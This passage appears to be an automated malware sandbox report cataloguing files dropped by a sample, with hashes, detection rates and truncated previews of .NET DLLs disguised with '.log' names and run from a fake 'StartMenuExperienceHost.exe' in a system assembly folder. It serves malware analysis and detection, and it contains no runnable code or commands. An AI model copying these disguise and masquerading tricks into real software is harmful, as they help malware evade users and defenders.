                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tVxnDAeWHD

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.243856189774724
                                                                Encrypted:false
                                                                SSDEEP:3:OT27tHW1Bkqjn:OT2hW4qj
                                                                MD5:D88E0B504DD138EA916A96500FDAB9B4
                                                                SHA1:7D371E8B21078F496B0343E4D6AAAE6C5721C67C
                                                                SHA-256:CD785821FD2FE9DE7EEEABCF77BCB70E63727BFEC188F0B8EE97F46BD3305550
                                                                SHA-512:74FF5060025A14810165B2BB5247106AB442662F2F338B021126FDECF465C697A3A45D7580AE2B34CEB889E39C3215FE7BE29B337CF5CCD99A06925AD53A478E
                                                                Malicious:false
                                                                Preview:QX5jM6SjvJHEnM5fKAQU4BAOF

                                                                C:\Users\user\AppData\Local\Temp\wSV99wd4ly

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.8439810553697228
                                                                Encrypted:false
                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\Desktop\459732b66deb3d

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with very long lines (871), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):871
                                                                Entropy (8bit):5.902075817109225
                                                                Encrypted:false
                                                                SSDEEP:24:9xkrx39CWaxjUv2dP9SP/al8dmOQrmjG5JEC61v:9xkrxN6mv2dlJYbVjiJEB
                                                                MD5:7FA44E00D4EB831D3134C382ABD96AFA
                                                                SHA1:A09C17507669C4331A994A90D63F43E53464C0BE
                                                                SHA-256:F6D31FD6F93AE1785D660A505A44869A38C6D7F56C11AC716C561752D70D813E
                                                                SHA-512:4B1B005D379A2AF72404421B27BD5F8F44E8290D38CF429CB2A4CD1AF7418CBC791A1B7D3958F4ECD8C89E70F0A80CE45C52569953EFC15E7835A74320A88F28
                                                                Malicious:false
                                                                Preview:aM6BNeCvEXQhMD0W1VJkDVJrgWS48Qc2WoD6YKtyItKL0fq6gRBLg6yEDOf0MHwy4YLhA37qmVbTL70BpVXrOQWZ093Jp2mA6WQcUJ6mTVjKee2FYdL0uEjoBvrAAxAutbXyqXrgZvY3rL4VGxvLrvQ1wmbib5mgUzbDHDYAwoa9qq7z0W3MBzC7KfCE6IEdI1j1u1NCZuZCURLGolsFCZefwd2mBUEnj70zHFF9I0xQZ9m3U5ZVa9btXDER8lAEqwdXbV9jfs7LlNFw09RG4sMkgHcDAyAgztkngPc860zrBPHJ8Ra9U4J8j21T36irrbW2ncQlgTKE2fiQ9SFsYBM5jlEnXIEASIAk3OfgBycAuFFDUkTl0zTpObTBXmNYPKwtf7XvwirjjLKefATwydJczUVc5eIZlEvkSViXNiySHtGDQzfXTbjwBT4Kl40SaS8fakLJb6iQo1VFOSLF8vFKe9j9bXvTsg1zvkmpnW5X2THJ8y6SsuUpMyAaBMsEKPhI9fTnpfcmzrRL1ZAmack8LMm7jLobn1Mmv9KdfTnMRszegzjlMFnspj6x2VDd1B88epa2OhHHzXqdWIbumCPhOe6MCXkJPJVQt090YrXo8f2S2dau4T1yvauAsOz1671qBZtgIkV5pkjsloTj60O5RheTG9HK1fsAoMQct4lT85IL1CYE4Q4Fs5Ye5aaIcKDK1iEYY0zCP47VYSbDkDPlknRsyvhTdc0x18UT89qDa10x8CFm8WiZ4cjNQWkmTgjwEKda8IFlWMKtxdtvq5UH4b2ZYGClZDu4SDtxipnzQ7CsS0awmy6XLb1mSEB1GdLSbQatt6MASe17YJHipQ9kHXt1MHfenvtwvtR

                                                                C:\Users\user\Desktop\BQDZBqHE.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23552
                                                                Entropy (8bit):5.519109060441589
                                                                Encrypted:false
                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Joe Sandbox View:
                                                                • Filename: RRjzYVukzs.exe, Detection: malicious, Browse
                                                                • Filename: Q9AQFOA6YC.exe, Detection: malicious, Browse
                                                                • Filename: fdsN8iw6WG.exe, Detection: malicious, Browse
                                                                • Filename: bR9BxUAkJW.exe, Detection: malicious, Browse
                                                                • Filename: Q13mrh42kO.exe, Detection: malicious, Browse
                                                                • Filename: LbsPIL0buh.exe, Detection: malicious, Browse
                                                                • Filename: AvQTFKdsST.exe, Detection: malicious, Browse
                                                                • Filename: 7xrBJ8v6sE.exe, Detection: malicious, Browse
                                                                • Filename: Zn0uX5K1ez.exe, Detection: malicious, Browse
                                                                • Filename: VUZeEe6Nhz.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\Babyelsr.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):40448
                                                                Entropy (8bit):5.7028690200758465
                                                                Encrypted:false
                                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\CEHhnDDC.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):40448
                                                                Entropy (8bit):5.7028690200758465
                                                                Encrypted:false
                                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\DBipIDSx.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):342528
                                                                Entropy (8bit):6.170134230759619
                                                                Encrypted:false
                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ExWQYAoA.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):126976
                                                                Entropy (8bit):6.057993947082715
                                                                Encrypted:false
                                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                C:\Users\user\Desktop\Gnkizmcn.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34816
                                                                Entropy (8bit):5.636032516496583
                                                                Encrypted:false
                                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\HkLqVmri.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\HrZgPASq.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):64000
                                                                Entropy (8bit):5.857602289000348
                                                                Encrypted:false
                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\KdaYGjcg.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34304
                                                                Entropy (8bit):5.618776214605176
                                                                Encrypted:false
                                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\KzWplSMm.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):70144
                                                                Entropy (8bit):5.909536568846014
                                                                Encrypted:false
                                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\LRfgsxYe.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32256
                                                                Entropy (8bit):5.631194486392901
                                                                Encrypted:false
                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\MnaxWgIk.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                C:\Users\user\Desktop\OpNfsPNf.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.660491370279985
                                                                Encrypted:false
                                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                MD5:240E98D38E0B679F055470167D247022
                                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\QaswzdXY.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):50176
                                                                Entropy (8bit):5.723168999026349
                                                                Encrypted:false
                                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\SzzvMtRI.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):342528
                                                                Entropy (8bit):6.170134230759619
                                                                Encrypted:false
                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\UQjmGZYR.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32256
                                                                Entropy (8bit):5.631194486392901
                                                                Encrypted:false
                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\XuBMTZHB.log

                                                                Download File
